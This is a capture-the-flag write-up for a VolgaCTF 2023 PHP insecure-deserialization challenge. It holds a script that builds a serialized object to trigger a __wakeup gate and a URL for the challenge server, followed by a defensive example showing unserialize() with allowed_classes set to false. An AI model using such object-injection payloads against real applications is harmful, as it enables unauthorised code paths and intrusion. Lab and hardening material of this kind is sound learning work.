This challenge requires a serialized PHP object to be set up so that the conditions for outputting the flag are met. The PlayGround class uses the __wakeup magic method, which runs as soon as the object is deserialized. To output the flag, each of the object's properties must contain an object that responds to the runMe method and returns a truthy value. An instance of the First class was used to fill all 3 properties and get the flag.
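<?php
// Local copies of the challenge classes, used only to build the payload.
class First {
    public $flag;

    public function runMe() {
        return $this->flag;
    }
}

class PlayGround {
    public $first;
    public $second;
    public $third;

    public function __construct() {
        $this->first = new First();
        // Second and UnfinishedСlass are not defined in this script, so these two
        // lines are commented out to let it run; all three properties are
        // overwritten below, and unserialize() never calls the constructor.
        // $this->second = new Second();
        // $this->third = new UnfinishedСlass();
    }

    // Runs automatically when the object is deserialized.
    public function __wakeup() {
        if ($this->first->runMe()) {
            if ($this->second->runMe()) {
                if ($this->third->runMe()) {
                    echo 'VolgaCTF{your flag}';
                }
            }
        }
    }
}

// One First instance whose runMe() returns true.
$x = new First();
$x->flag = true;

// Fill all three properties with that instance.
$p = new PlayGround();
$p->first = $x;
$p->second = $x;
$p->third = $x;

// Serialize the object and URL-encode it for the payload parameter.
$payload = serialize($p);
echo "Go get the flag http://php.tasks.q.2023.volgactf.ru:8080/?payload=" . urlencode($payload);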
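
The defensive side of the same mechanism, as an added example that is not part of the original write-up or the challenge source: the same payload shape is passed to unserialize() once without restrictions and once with the allowed_classes option set to false. The $gateOpened counter and the condensed __wakeup body are assumptions made for illustration; the classes are constructed stand-ins for the challenge's.

```php
<?php
// Constructed stand-ins for the challenge classes. The gate increments a
// counter instead of echoing the flag so the outcome can be inspected.
class First {
    public $flag;
    public function runMe() {
        return $this->flag;
    }
}

class PlayGround {
    public static $gateOpened = 0;   // hypothetical counter, not in the challenge
    public $first;
    public $second;
    public $third;

    public function __wakeup() {
        if ($this->first->runMe() && $this->second->runMe() && $this->third->runMe()) {
            self::$gateOpened++;
        }
    }
}

// Constructed sample input with the same shape as the payload built above.
$x = new First();
$x->flag = true;
$p = new PlayGround();
$p->first = $p->second = $p->third = $x;
$payload = serialize($p);

// Weak: every class named in the input is instantiated, so __wakeup runs
// with property values chosen by whoever supplied the string.
PlayGround::$gateOpened = 0;
unserialize($payload);
echo "unrestricted: gate opened ", PlayGround::$gateOpened, " time(s)\n";

// Hardened: with allowed_classes => false no class from the input is
// instantiated. Every object becomes __PHP_Incomplete_Class and no magic
// method of PlayGround or First is invoked.
PlayGround::$gateOpened = 0;
$obj = unserialize($payload, ['allowed_classes' => false]);
echo "restricted: result is a ", get_class($obj), "\n";
echo "restricted: gate opened ", PlayGround::$gateOpened, " time(s)\n";
```

Where objects are not needed at all, accepting plain data such as JSON and building the objects server-side removes the magic-method entry point entirely.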